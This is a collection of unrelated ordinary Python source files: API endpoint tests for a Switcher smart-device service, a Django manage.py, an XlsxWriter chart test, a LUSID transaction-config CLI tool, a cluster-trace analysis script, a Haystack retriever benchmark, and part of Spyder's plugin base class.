assert body[consts.KEY_AUTO_OFF] == consts.DUMMY_AUTO_OFF
assert body[consts.KEY_POWER_CONSUMPTION] == (
consts.DUMMY_POWER_CONSUMPTION
)
assert body[consts.KEY_ELECTRIC_CURRENT] == (
consts.DUMMY_ELECTRIC_CURRENT
)
get_state_response.init_future.result().successful = False
async with ClientSession() as session:
async with session.get(URL_GET_STATE) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
patcher.return_value = None
async with session.get(URL_GET_STATE) as response:
assert response.status == 503
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Failed to get response from api."
)
async def test_set_auto_shutdown_request(
set_auto_shutdown_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/set_auto_shutdown request.
Args:
set_auto_shutdown_response: fixture of mocked
``SwitcherV2SetAutoOffResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.set_auto_shutdown",
return_value=set_auto_shutdown_response,
):
async with ClientSession() as session:
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "1", consts.PARAM_MINUTES: "30"},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_AUTO_SHUTDOWN,
**{
"json": {
consts.PARAM_HOURS: "1",
consts.PARAM_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "3", consts.PARAM_MINUTES: "1"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Auto shutdown can be set between 1 and 3 hours."
)
async with session.post(URL_SET_AUTO_SHUTDOWN) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: One of the arguments hours or minutes is missing." # noqa: E501
)
set_auto_shutdown_response.msg_type = ResponseMessageType.STATE
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "1", consts.PARAM_MINUTES: "30"},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_set_device_name_request(
set_device_name_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/set_device_name request.
Args:
set_device_name_response: fixture of mocked
``SwitcherV2UpdateNameResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.set_device_name",
return_value=set_device_name_response,
):
async with ClientSession() as session:
async with session.post(
URL_SET_DEVICE_NAME,
params={consts.PARAM_NAME: "new device name"},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_DEVICE_NAME,
**{"json": {consts.PARAM_NAME: "new device name"}},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_DEVICE_NAME, params={consts.PARAM_NAME: "x"}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Only accepts name with length between 2 and 32."
)
async with session.post(URL_SET_DEVICE_NAME) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.text == "Error: Argument name is missing."
set_device_name_response.msg_type = ResponseMessageType.STATE
async with session.post(
URL_SET_DEVICE_NAME,
params={consts.PARAM_NAME: "new device name"},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_turn_off_request(control_response: MagicMock) -> None:
"""Unit test-cases for /switcher/turn_off request.
Args:
control_response: fixture of mocked
``SwitcherV2ControlResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.control_device",
return_value=control_response,
):
async with ClientSession() as session:
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
control_response.successful = False
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE not in body
control_response.msg_type = ResponseMessageType.STATE
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_turn_on_request(control_response: MagicMock) -> None:
"""Unit test-cases for /switcher/turn_on request.
Args:
control_response: fixture of mocked
``SwitcherV2ControlResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.control_device",
return_value=control_response,
):
async with ClientSession() as session:
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: 30}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, **{"json": {consts.PARAM_MINUTES: 30}}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: 181}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Can only accept timer for 1 to 180 minutes."
)
control_response.msg_type = ResponseMessageType.STATE
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
control_response.successful = False
control_response.msg_type = ResponseMessageType.CONTROL
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: "noint"}
) as response:
assert response.status == 500
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.h1.text == "Internal Server Error"
async with session.post(
URL_TURN_ON, **{"json": {consts.PARAM_MINUTES: "noint"}}
) as response:
assert response.status == 500
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.h1.text == "Internal Server Error"
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
#!/usr/bin/env python
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core_app.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_data_labels19.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [45740416, 45747584]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'values': '=Sheet1!$A$1:$A$5',
'data_labels': {'value': 1, 'category': 1},
})
chart.add_series({
'values': '=Sheet1!$B$1:$B$5',
'data_labels': {'value': 1, 'category': 1, 'separator': "\n"},
})
chart.add_series({
'values': '=Sheet1!$C$1:$C$5',
'data_labels': {'value': 1, 'category': 1, 'separator': ' '},
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
from lusidtools.lpt import lpt
from lusidtools.lpt import lse
from lusidtools.lpt import stdargs
from lusidtools.lpt import txn_config_yaml as tcy
TOOLNAME = "txn_cfg"
TOOLTIP = "Get/Set the transaction configuration"
def parse(extend=None, args=None):
return (
stdargs.Parser(
"Get/Set transaction configuration", ["filename", "limit", "NODFQ"]
)
.add(
"action",
choices=("get", "set", "try"),
help="get or set the config. 'Try' can be used to validate a custom encoding",
)
.add("--raw", action="store_true", help="use raw (non custom) encoding")
.add("--json", action="store_true", help="display the json to be sent")
.add("--group", action="store_true", help="set a single group")
.add(
"--force",
action="store_true",
help="set a single group, remove existing aliases for the group",
)
.extend(extend)
.parse(args)
)
def validate_group(txn_types, group):
for txn in txn_types:
for alias in txn.aliases:
assert alias.transaction_group == group, "More than one group in the list"
def rem_groups(txn_types_old, group, arg):
def still_valid(tt):
for cand in tt.aliases:
if cand.transaction_group != group:
return True
if arg is not True:
raise AssertionError(
"Existing group detected, use '--force' to remove them"
)
return False
def clear_out_group(tt):
check = len(tt.aliases)
tt.aliases = [cand for cand in tt.aliases if cand.transaction_group != group]
if len(tt.aliases) != check and arg != True:
raise AssertionError(
"Existing group detected, use '--force' to remove them"
)
return tt
return [clear_out_group(t) for t in txn_types_old if still_valid(t)]
def merge_sets(txn_types_old, txn_types, arg):
group = txn_types[0].aliases[0].transaction_group
validate_group(txn_types, group)
txn_types_clean = rem_groups(txn_types_old, group, arg)
txn_types += txn_types_clean
return txn_types
def process_args(api, args):
y = tcy.TxnConfigYaml(api.models)
if args.action == "get":
def get_success(result):
y.dump(
y.TransactionSetConfigurationDataNoLinks(
result.content.transaction_configs, result.content.side_definitions
),
args.filename,
args.raw,
)
return None
return api.call.list_configuration_transaction_types().bind(get_success)
if args.action == "try":
ffs = y.load(args.filename)
y.dump(ffs, "{}-try".format(args.filename))
if args.action == "set":
def set_success(result):
print(y.get_yaml(result.content))
return None
if args.group:
txn_types = y.load(args.filename)
result = api.call.list_configuration_transaction_types()
if result.right is not None:
txn_types_old = result.right.content
else:
raise ValueError("Api call did not return correct result")
txn_types = y.load_update_str(
y.get_yaml(merge_sets(txn_types_old, txn_types, args.force))
)
else:
txn_types = y.load_update(args.filename)
# y.dump(ffs,"{}-set".format(args.filename),True)
if args.json:
print(txn_types)
return None
else:
return api.call.set_configuration_transaction_types(types=txn_types).bind(
set_success
)
# Standalone tool
def main(parse=parse):
lpt.standard_flow(parse, lse.connect, process_args)
|
# -*- coding: utf-8 -*-
# In this script we find all the history behind an evicted task that has not been finished/killed/failed/lost.
# We find how many times it has been submitted and what were the events related to this task.
# The violatedtasks dictionary is the one that is we are looking for. It has only one entry
# for each (jobid, taskindex) and the rest is stored in a multidimensional array.
# This database is a test as it is only using 1/500 of the task_events table.
# Also the not_finished_evictedtasks is only for the first(1/500) part of the tasks_events table.
# Since the script assumed that the machine state changes in the machine table when a task is added,
# it is not getting the right results. The problem is that the machines table is only updated when a
# machine is added so it is just the events of the machines, in order to find the available cpu,
# memory and disk of a specific machine at the time that a task is assigned to a machine,
# we need to have more complicated calculations.(refer to createDB3)
# @author: reyhane_askari
# Universite de Montreal, Dec 2015
from os import chdir, listdir
from pandas import read_csv
from os import path
from random import randint, sample, seed
from collections import OrderedDict
from pandas import DataFrame
import numpy as np
import matplotlib.pyplot as plt
import csv
import codecs
chdir('/home/askrey/Dropbox/Project_step_by_step/2_find_violations/csvs')
task_events_csv_colnames = ['time', 'missing', 'job_id', 'task_idx', 'machine_id', 'event_type', 'user', 'sched_cls',
'priority', 'cpu_requested', 'mem_requested', 'disk', 'restriction']
evictedtasks = OrderedDict([])
violatedtasks = OrderedDict([])
for key, val in csv.reader(open("not_finished_evictedtasks.csv")):
evictedtasks[key] = val
machines_dictionary = OrderedDict([])
#load machine events table:
chdir('/home/askrey/Final_project')
reader = csv.reader(codecs.open('part-00000-of-00001.csv','rU','utf-8'))
# key of machines_dictionary is the primary fields of the machine events table (time, machine id)
# other fields: event type, platform id, CUPs, memory
for row in reader:
machines_dictionary[(row[0],row[1])] = row[2:]
#for fn in sorted(listdir('task_events')):
fp = path.join('task_events',sorted(listdir('task_events'))[0])
task_events_df = read_csv(fp, header = None, index_col = False, names = task_events_csv_colnames, compression = 'gzip')
for index, event in task_events_df.iterrows():
if (event['job_id'], event['task_idx']) in violatedtasks:
violatedtasks[event['job_id'],event['task_idx']][0].append(event['time'])
violatedtasks[event['job_id'],event['task_idx']][2].append(event['machine_id'])
violatedtasks[event['job_id'],event['task_idx']][3].append(event['event_type'])
violatedtasks[event['job_id'],event['task_idx']][11].append((machines_dictionary[(str(event['time']),str(event['machine_id']))] if (str(event['time']), str(event['machine_id'])) in machines_dictionary else 0))
elif ("("+str(event['job_id'])+ ", "+ str(event['task_idx'])+")") in evictedtasks:
violatedtasks[event['job_id'],event['task_idx']] = [[event['time']],event['missing'],[event['machine_id']],
[event['event_type']], event['user'], event['sched_cls'], event['priority'], event['cpu_requested'],
event['mem_requested'], event['disk'], event['restriction'],
[(machines_dictionary[(str(event['time']),str(event['machine_id']))] if (str(event['time']), str(event['machine_id'])) in machines_dictionary else 0 )]]
# moshkel alan in hast k ye jahaE event ha hanooz machine barashoon assign nashode vase hamin hast k machine id nan hast
writer = csv.writer(open('/home/askrey/Dropbox/Databases/testDB5.csv', 'wb'))
for key, value in violatedtasks.items():
writer.writerow([key, value])
|
import pandas as pd
from pathlib import Path
from time import perf_counter
from utils import get_document_store, get_retriever, index_to_doc_store, load_config
from haystack.preprocessor.utils import eval_data_from_json
from haystack.document_store.faiss import FAISSDocumentStore
from haystack import Document
import pickle
import time
from tqdm import tqdm
import logging
import datetime
import random
import traceback
import os
import requests
from farm.file_utils import download_from_s3
import json
from results_to_json import retriever as retriever_json
from templates import RETRIEVER_TEMPLATE, RETRIEVER_MAP_TEMPLATE, RETRIEVER_SPEED_TEMPLATE
logger = logging.getLogger(__name__)
logging.getLogger("haystack.retriever.base").setLevel(logging.WARN)
logging.getLogger("elasticsearch").setLevel(logging.WARN)
doc_index = "eval_document"
label_index = "label"
index_results_file = "retriever_index_results.csv"
query_results_file = "retriever_query_results.csv"
overview_json = "../../docs/_src/benchmarks/retriever_performance.json"
map_json = "../../docs/_src/benchmarks/retriever_map.json"
speed_json = "../../docs/_src/benchmarks/retriever_speed.json"
seed = 42
random.seed(42)
def benchmark_indexing(n_docs_options, retriever_doc_stores, data_dir, filename_gold, filename_negative, data_s3_url, embeddings_filenames, embeddings_dir, update_json, save_markdown, **kwargs):
retriever_results = []
for n_docs in n_docs_options:
for retriever_name, doc_store_name in retriever_doc_stores:
logger.info(f"##### Start indexing run: {retriever_name}, {doc_store_name}, {n_docs} docs ##### ")
try:
doc_store = get_document_store(doc_store_name)
retriever = get_retriever(retriever_name, doc_store)
docs, _ = prepare_data(data_dir=data_dir,
filename_gold=filename_gold,
filename_negative=filename_negative,
data_s3_url=data_s3_url,
embeddings_filenames=embeddings_filenames,
embeddings_dir=embeddings_dir,
n_docs=n_docs)
tic = perf_counter()
index_to_doc_store(doc_store, docs, retriever)
toc = perf_counter()
indexing_time = toc - tic
print(indexing_time)
retriever_results.append({
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"indexing_time": indexing_time,
"docs_per_second": n_docs / indexing_time,
"date_time": datetime.datetime.now(),
"error": None})
retriever_df = pd.DataFrame.from_records(retriever_results)
retriever_df = retriever_df.sort_values(by="retriever").sort_values(by="doc_store")
retriever_df.to_csv(index_results_file)
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
if save_markdown:
md_file = index_results_file.replace(".csv", ".md")
with open(md_file, "w") as f:
f.write(str(retriever_df.to_markdown()))
time.sleep(10)
del doc_store
del retriever
except Exception:
tb = traceback.format_exc()
logging.error(f"##### The following Error was raised while running indexing run: {retriever_name}, {doc_store_name}, {n_docs} docs #####")
logging.error(tb)
retriever_results.append({
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"indexing_time": 0,
"docs_per_second": 0,
"date_time": datetime.datetime.now(),
"error": str(tb)})
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(10)
del doc_store
del retriever
if update_json:
populate_retriever_json()
def benchmark_querying(n_docs_options,
retriever_doc_stores,
data_dir,
data_s3_url,
filename_gold,
filename_negative,
n_queries,
embeddings_filenames,
embeddings_dir,
update_json,
save_markdown,
**kwargs):
""" Benchmark the time it takes to perform querying. Doc embeddings are loaded from file."""
retriever_results = []
for n_docs in n_docs_options:
for retriever_name, doc_store_name in retriever_doc_stores:
try:
logger.info(f"##### Start querying run: {retriever_name}, {doc_store_name}, {n_docs} docs ##### ")
if retriever_name == "elastic":
similarity = "cosine"
else:
similarity = "dot_product"
doc_store = get_document_store(doc_store_name, similarity=similarity)
retriever = get_retriever(retriever_name, doc_store)
add_precomputed = retriever_name in ["dpr"]
# For DPR, precomputed embeddings are loaded from file
docs, labels = prepare_data(data_dir=data_dir,
filename_gold=filename_gold,
filename_negative=filename_negative,
data_s3_url=data_s3_url,
embeddings_filenames=embeddings_filenames,
embeddings_dir=embeddings_dir,
n_docs=n_docs,
n_queries=n_queries,
add_precomputed=add_precomputed)
logger.info("Start indexing...")
index_to_doc_store(doc_store, docs, retriever, labels)
logger.info("Start queries...")
raw_results = retriever.eval()
results = {
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"n_queries": raw_results["n_questions"],
"retrieve_time": raw_results["retrieve_time"],
"queries_per_second": raw_results["n_questions"] / raw_results["retrieve_time"],
"seconds_per_query": raw_results["retrieve_time"]/ raw_results["n_questions"],
"recall": raw_results["recall"] * 100,
"map": raw_results["map"] * 100,
"top_k": raw_results["top_k"],
"date_time": datetime.datetime.now(),
"error": None
}
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(5)
del doc_store
del retriever
except Exception:
tb = traceback.format_exc()
logging.error(f"##### The following Error was raised while running querying run: {retriever_name}, {doc_store_name}, {n_docs} docs #####")
logging.error(tb)
results = {
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"n_queries": 0,
"retrieve_time": 0.,
"queries_per_second": 0.,
"seconds_per_query": 0.,
"recall": 0.,
"map": 0.,
"top_k": 0,
"date_time": datetime.datetime.now(),
"error": str(tb)
}
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(5)
del doc_store
del retriever
logger.info(results)
retriever_results.append(results)
retriever_df = pd.DataFrame.from_records(retriever_results)
retriever_df = retriever_df.sort_values(by="retriever").sort_values(by="doc_store")
retriever_df.to_csv(query_results_file)
if save_markdown:
md_file = query_results_file.replace(".csv", ".md")
with open(md_file, "w") as f:
f.write(str(retriever_df.to_markdown()))
if update_json:
populate_retriever_json()
def populate_retriever_json():
retriever_overview_data, retriever_map_data, retriever_speed_data = retriever_json(index_csv=index_results_file,
query_csv=query_results_file)
overview = RETRIEVER_TEMPLATE
overview["data"] = retriever_overview_data
map = RETRIEVER_MAP_TEMPLATE
map["data"] = retriever_map_data
speed = RETRIEVER_SPEED_TEMPLATE
speed["data"] = retriever_speed_data
json.dump(overview, open(overview_json, "w"), indent=4)
json.dump(speed, open(speed_json, "w"), indent=4)
json.dump(map, open(map_json, "w"), indent=4)
def add_precomputed_embeddings(embeddings_dir, embeddings_filenames, docs):
ret = []
id_to_doc = {x.meta["passage_id"]: x for x in docs}
for ef in embeddings_filenames:
logger.info(f"Adding precomputed embeddings from {embeddings_dir + ef}")
filename = embeddings_dir + ef
embeds = pickle.load(open(filename, "rb"))
for i, vec in embeds:
if int(i) in id_to_doc:
curr = id_to_doc[int(i)]
curr.embedding = vec
ret.append(curr)
# In the official DPR repo, there are only 20594995 precomputed embeddings for 21015324 wikipedia passages
# If there isn't an embedding for a given doc, we remove it here
ret = [x for x in ret if x.embedding is not None]
logger.info(f"Embeddings loaded for {len(ret)}/{len(docs)} docs")
return ret
def prepare_data(data_dir, filename_gold, filename_negative, data_s3_url, embeddings_filenames, embeddings_dir, n_docs=None, n_queries=None, add_precomputed=False):
"""
filename_gold points to a squad format file.
filename_negative points to a csv file where the first column is doc_id and second is document text.
If add_precomputed is True, this fn will look in the embeddings files for precomputed embeddings to add to each Document
"""
logging.getLogger("farm").setLevel(logging.INFO)
download_from_s3(data_s3_url + filename_gold, cache_dir=data_dir)
download_from_s3(data_s3_url + filename_negative, cache_dir=data_dir)
if add_precomputed:
for embedding_filename in embeddings_filenames:
download_from_s3(data_s3_url + str(embeddings_dir) + embedding_filename, cache_dir=data_dir)
logging.getLogger("farm").setLevel(logging.WARN)
gold_docs, labels = eval_data_from_json(data_dir + filename_gold)
# Reduce number of docs
gold_docs = gold_docs[:n_docs]
# Remove labels whose gold docs have been removed
doc_ids = [x.id for x in gold_docs]
labels = [x for x in labels if x.document_id in doc_ids]
# Filter labels down to n_queries
selected_queries = list(set(f"{x.document_id} | {x.question}" for x in labels))
selected_queries = selected_queries[:n_queries]
labels = [x for x in labels if f"{x.document_id} | {x.question}" in selected_queries]
n_neg_docs = max(0, n_docs - len(gold_docs))
neg_docs = prepare_negative_passages(data_dir, filename_negative, n_neg_docs)
docs = gold_docs + neg_docs
if add_precomputed:
docs = add_precomputed_embeddings(data_dir + embeddings_dir, embeddings_filenames, docs)
return docs, labels
def prepare_negative_passages(data_dir, filename_negative, n_docs):
if n_docs == 0:
return []
with open(data_dir + filename_negative) as f:
lines = []
_ = f.readline() # Skip column titles line
for _ in range(n_docs):
lines.append(f.readline()[:-1])
docs = []
for l in lines[:n_docs]:
id, text, title = l.split("\t")
d = {"text": text,
"meta": {"passage_id": int(id),
"title": title}}
d = Document(**d)
docs.append(d)
return docs
if __name__ == "__main__":
params, filenames = load_config(config_filename="config.json", ci=True)
benchmark_indexing(**params, **filenames, update_json=True, save_markdown=False)
benchmark_querying(**params, **filenames, update_json=True, save_markdown=False)
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Base plugin class
"""
# Standard library imports
import inspect
import os
import sys
# Third party imports
import qdarkstyle
from qtpy.QtCore import Qt, Slot
from qtpy.QtGui import QCursor, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QToolButton)
# Local imports
from spyder.config.base import _
from spyder.config.gui import get_color_scheme, get_font, is_dark_interface
from spyder.config.manager import CONF
from spyder.config.user import NoDefault
from spyder.py3compat import configparser, is_text_string
from spyder.utils.icon_manager import ima
from spyder.utils.qthelpers import (
add_actions, create_action, create_toolbutton, MENU_SEPARATOR,
toggle_actions, set_menu_icons)
from spyder.widgets.dock import SpyderDockWidget
class BasePluginMixin(object):
"""Implementation of the basic functionality for Spyder plugins."""
# Define configuration name map for plugin to split configuration
# among several files. See spyder/config/main.py
# Status: Hidden
_CONF_NAME_MAP = None
def __init__(self, parent=None):
super(BasePluginMixin, self).__init__()
# Check compatibility
check_compatibility, message = self.check_compatibility()
self._register_plugin()
self._is_compatible = True
if not check_compatibility:
self._is_compatible = False
self._show_compatibility_message(message)
def _register_plugin(self):
"""Register plugin configuration."""
CONF.register_plugin(self)
def _set_option(self, option, value, section=None,
recursive_notification=True):
"""Set option in spyder.ini"""
section = self.CONF_SECTION if section is None else section
CONF.set(section, str(option), value,
recursive_notification=recursive_notification)
def _get_option(self, option, default=NoDefault, section=None):
"""Get option from spyder.ini."""
section = self.CONF_SECTION if section is None else section
return CONF.get(section, option, default)
def _remove_option(self, option, section=None):
"""Remove option from spyder.ini."""
section = self.CONF_SECTION if section is None else section
CONF.remove_option(section, option)
def _show_status_message(self, message, timeout=0):
"""Show message in main window's status bar."""
self.main.statusBar().showMessage(message, timeout)
def _show_compatibility_message(self, message):
"""Show a compatibility message."""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle('Compatibility Check')
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def _starting_long_process(self, message):
"""
Show message in main window's status bar and change cursor to
Qt.WaitCursor
"""
self._show_status_message(message)
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
QApplication.processEvents()
def _ending_long_process(self, message=""):
"""
Clear main window's status bar and restore mouse cursor.
"""
QApplication.restoreOverrideCursor()
self._show_status_message(message, timeout=2000)
QApplication.processEvents()
def _get_plugin_path(self):
"""Return filesystem path to the root directory of the plugin."""
return os.path.dirname(inspect.getfile(self.__class__))
def _create_configwidget(self, dlg, main_window):
"""Create configuration dialog box page widget"""
if self.CONFIGWIDGET_CLASS is not None:
parent = self
main = dlg
if not hasattr(self, 'dockwidget'):
# Prevent QWidget assignment to a plugin that does not have
# a graphical widget.
parent = dlg
main = main_window
configwidget = self.CONFIGWIDGET_CLASS(parent, main)
configwidget.initialize()
return configwidget
class PluginWindow(QMainWindow):
"""MainWindow subclass that contains a Spyder Plugin."""
def __init__(self, plugin):
QMainWindow.__init__(self)
self.plugin = plugin
# Setting interface theme
if is_dark_interface():
self.setStyleSheet(qdarkstyle.load_stylesheet_from_environment())
def closeEvent(self, event):
"""Reimplement Qt method."""
self.plugin.set_ancestor(self.plugin.main)
self.plugin.dockwidget.setWidget(self.plugin)
self.plugin.dockwidget.setVisible(True)
self.plugin.switch_to_plugin()
QMainWindow.closeEvent(self, event)
# Qt might want to do something with this soon,
# So it should not be deleted by python yet.
# Fixes spyder-ide/spyder#10704
self.plugin.__unsafe__window = self
self.plugin._undocked_window = None
class BasePluginWidgetMixin(object):
"""
Implementation of the basic functionality for Spyder plugin widgets.
"""
def __init__(self, parent=None):
super(BasePluginWidgetMixin, self).__init__()
# Actions to add to the Options menu
self._plugin_actions = None
# Attribute to keep track if the plugin is undocked in a
# separate window
self._undocked_window = None
self._ismaximized = False
self._default_margins = None
self._isvisible = False
self.shortcut = None
# Options buttons
self.options_button = create_toolbutton(self, text=_('Options'),
icon=ima.icon('tooloptions'))
self.options_button.setPopupMode(QToolButton.InstantPopup)
# Don't show menu arrow and remove padding
if is_dark_interface():
self.options_button.setStyleSheet(
("QToolButton::menu-indicator{image: none;}\n"
"QToolButton{padding: 3px;}"))
else:
self.options_button.setStyleSheet(
"QToolButton::menu-indicator{image: none;}")
# Options menu
self._options_menu = QMenu(self)
# We decided to create our own toggle action instead of using
# the one that comes with dockwidget because it's not possible
# to raise and focus the plugin with it.
self._toggle_view_action = None
# Default actions for Options menu
self._dock_action = create_action(
self,
_("Dock"),
icon=ima.icon('dock'),
tip=_("Dock the pane"),
triggered=self._close_window)
self._undock_action = create_action(
self,
_("Undock"),
icon=ima.icon('undock'),
tip=_("Undock the pane"),
triggered=self._create_window)
self._close_plugin_action = create_action(
self,
_("Close"),
icon=ima.icon('close_pane'),
tip=_("Close the pane"),
triggered=self._plugin_closed)
def _initialize_plugin_in_mainwindow_layout(self):
"""
If this is the first time the plugin is shown, perform actions to
initialize plugin position in Spyder's window layout.
Use on_first_registration to define the actions to be run
by your plugin
"""
if self.get_option('first_time', True):
try:
self.on_first_registration()
except NotImplementedError:
return
self.set_option('first_time', False)
def _update_margins(self):
"""Update plugin margins"""
layout = self.layout()
if self._default_margins is None:
self._default_margins = layout.getContentsMargins()
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
layout.setContentsMargins(*[margin]*4)
else:
layout.setContentsMargins(*self._default_margins)
def _update_plugin_title(self):
"""Update plugin title, i.e. dockwidget or window title"""
if self.dockwidget is not None:
win = self.dockwidget
elif self._undocked_window is not None:
win = self._undocked_window
else:
return
win.setWindowTitle(self.get_plugin_title())
def _create_dockwidget(self):
"""Add to parent QMainWindow as a dock widget"""
# Creating dock widget
dock = SpyderDockWidget(self.get_plugin_title(), self.main)
# Set properties
dock.setObjectName(self.__class__.__name__+"_dw")
dock.setAllowedAreas(dock.ALLOWED_AREAS)
dock.setFeatures(dock.FEATURES)
dock.setWidget(self)
self._update_margins()
dock.visibilityChanged.connect(self._visibility_changed)
dock.topLevelChanged.connect(self._on_top_level_changed)
dock.sig_plugin_closed.connect(self._plugin_closed)
self.dockwidget = dock
# NOTE: Don't use the default option of CONF.get to assign a
# None shortcut to plugins that don't have one. That will mess
# the creation of our Keyboard Shortcuts prefs page
try:
context = '_'
name = 'switch to {}'.format(self.CONF_SECTION)
self.shortcut = CONF.get_shortcut(context, name,
plugin_name=self.CONF_SECTION)
except (configparser.NoSectionError, configparser.NoOptionError):
pass
if self.shortcut is not None and self.main is not None:
sc = QShortcut(QKeySequence(self.shortcut), self.main,
self.switch_to_plugin)
self.register_shortcut(sc, "_", "Switch to {}".format(
self.CONF_SECTION))
return (dock, dock.LOCATION)
def _switch_to_plugin(self):
"""Switch to plugin."""
if (self.main.last_plugin is not None and
self.main.last_plugin._ismaximized and
self.main.last_plugin is not self):
self.main.maximize_dockwidget()
if not self._toggle_view_action.isChecked():
self._toggle_view_action.setChecked(True)
self._visibility_changed(True)
@Slot()
def _plugin_closed(self):
"""DockWidget was closed."""
if self._toggle_view_action:
self._toggle_view_action.setChecked(False)
def _get_font(self, rich_text=False):
"""Return plugin font."""
if rich_text:
option = 'rich_font'
